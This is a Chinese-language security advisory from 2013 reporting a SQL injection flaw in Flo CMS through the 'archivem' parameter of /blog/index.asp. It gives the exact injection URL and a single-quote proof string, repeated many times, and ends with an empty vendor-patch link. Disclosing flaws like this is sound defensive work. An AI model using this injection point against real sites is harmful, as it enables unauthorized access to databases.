发布日期:2013-09-05
更新日期:2013-09-08
受影响系统:
Flo CMS Flo CMS
描述:
--------------------------------------------------------------------------------
Flo CMS是内容管理系统。
Flo CMS没有正确过滤/blog/index.asp的"archivem" GET参数,远程攻击者通过注入任意SQL代码,即可利用此漏洞操作SQL查询。
<*来源:Ashiyane Digital Security Team
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# [+] Exploit :
#
# [+] Location : [Target]/blog/index.asp?archivem=[Sql Injection]
#
#-------
# Proof:
#-------
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
#
# ?archivem='
建议:
--------------------------------------------------------------------------------
厂商补丁:
Flo CMS
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: